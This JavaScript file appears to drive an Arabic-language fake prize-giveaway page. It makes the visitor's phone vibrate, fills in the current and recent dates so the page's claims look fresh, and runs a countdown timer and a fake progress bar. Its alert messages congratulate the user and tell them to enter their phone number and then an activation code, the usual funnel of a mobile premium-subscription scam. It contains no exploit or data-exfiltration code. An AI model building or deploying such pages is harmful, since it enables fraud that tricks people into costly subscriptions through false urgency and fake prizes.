

var montharray=new Array("يناير", "فبراير", "مارس", "أبريل", "مايو", "يونيو", "يوليو", "أغسطس", "سبتمبر", "أكتوبر", "نوفمبر", "ديسمبر");
var mydate=new Date();
function vibrate_phones() {
    navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
    if (navigator.vibrate) {
        navigator.vibrate([1000, 500, 1000, 500, 1000, 500]);
    }
}

function today_now() {

                            mydate.setDate(mydate.getDate()-0);
                            var year=mydate.getYear()
                            if (year < 1000)
                            year+=1900
                            var day=mydate.getDay()
                            var month=mydate.getMonth()
                            var daym=mydate.getDate()
                            if (daym<10)
                            daym="0"+daym
                            var dayarray = new Array("كل يوم أحــد", "كل يوم أثنـين", "كل يوم ثـلاثاء", "كل يوم أربـعاء", "كل يوم خميس", "كل يوم جمعة", "كل يوم سـبت")
                            var montharray=new Array("يناير", "فبراير", "مارس", "أبريل", "مايو", "يونيو", "يوليو", "أغسطس", "سبتمبر", "أكتوبر", "نوفمبر", "ديسمبر")
                           // document.write(""+daym+" "+montharray[month]+"")
       
        document.getElementById("month").innerHTML = ""+daym+" "+montharray[month]+"";
        document.getElementById("month_c0").innerHTML = ""+daym+" "+montharray[month]+"";
        document.getElementById("today").innerHTML = ""+dayarray[mydate.getDay()]+"";
       
        
}
function today_now_1() {
    mydate.setDate(mydate.getDate() - 1);
    var month = mydate.getMonth();
    var daym = mydate.getDate();
    if (daym < 10) daym = "0" + daym;
    //document.write("" + montharray[month] + " " + daym + "");
    document.getElementById("month_c1").innerHTML = ""+daym+" "+montharray[month]+"";
    document.getElementById("month_c11").innerHTML = ""+daym+" "+montharray[month]+"";
}

function today_now_2() {
    mydate.setDate(mydate.getDate() - 2);
    var month = mydate.getMonth();
    var daym = mydate.getDate();
    if (daym < 10) daym = "0" + daym;
    //document.write("" + montharray[month] + " " + daym + "");
    document.getElementById("month_c2").innerHTML = ""+daym+" "+montharray[month]+"";
}
function today_now_3() {
    mydate.setDate(mydate.getDate() - 3);
    var month = mydate.getMonth();
    var daym = mydate.getDate();
    if (daym < 10) daym = "0" + daym;
    //document.write("" + montharray[month] + " " + daym + "");
    document.getElementById("month_c3").innerHTML = ""+daym+" "+montharray[month]+"";
}
function today_now_4() {
    mydate.setDate(mydate.getDate() - 4);
    var month = mydate.getMonth();
    var daym = mydate.getDate();
    if (daym < 10) daym = "0" + daym;
    //document.write("" + montharray[month] + " " + daym + "");
    document.getElementById("month_c4").innerHTML = ""+daym+" "+montharray[month]+"";
    document.getElementById("month_c44").innerHTML = ""+daym+" "+montharray[month]+"";
}
function today_now_5() {
    mydate.setDate(mydate.getDate() - 5);
    var month = mydate.getMonth();
    var daym = mydate.getDate();
    if (daym < 10) daym = "0" + daym;
    //document.write("" + montharray[month] + " " + daym + "");
    document.getElementById("month_c5").innerHTML = ""+daym+" "+montharray[month]+"";
}


function startTimer(t){var e,n,r=t,a=setInterval(function(){e=parseInt(r/60,10),n=parseInt(r%60,10),n=10>n?"0"+n:n,$("#timerr").text(e+" دقيقة "+n+" ثانية"),--r<0&&(clearInterval(a))},1e3)}


var slidewhere = 0;
var holvanszlider = 0;

function drawszlider(ossz, meik) {
        var szazalek = Math.round((meik * 100) / ossz);
        document.getElementById("szliderbar").style.width = szazalek + "%";
        document.getElementById("szazalek").innerHTML = szazalek + "%";
        holvanszlider = meik;
        t = setTimeout("drawszlider(100, slidewhere);slidewhere = holvanszlider + 1; if (slidewhere > 100) {slidewhere = 100;}", 132);
}
function exit_no() {
      alert("عفوا، غير متوفر! الرجاء اختيار جائزة أخرى.");
}

function exit_yes() {
      alert("تهانينا لديك فرصه  للاشتراك وفرصه كبيرة جدا للفوز \n\n\n ****قواعد الاشتراك****\n\n1-انقر موافق \n 2-ادخل رقم الهاتف الخاص بك فى الصفحة التالية\n 3-ادخل رمز التفعيل والضغط على موافق \n 4-يرجى قراءه الشروط والاحكام ");
    
}

function speak(text) {
  var msg = new SpeechSynthesisUtterance();
  var voices = speechSynthesis.getVoices();
  msg.voice = voices[2];
  msg.voiceURI = 'native';
  msg.volume = 1;
  msg.rate = 1;
  msg.pitch = 1;
  msg.text = text;
  msg.lang = 'en-US';

  speechSynthesis.speak(msg);
}
  
function prize_1() {


    
}
 
 
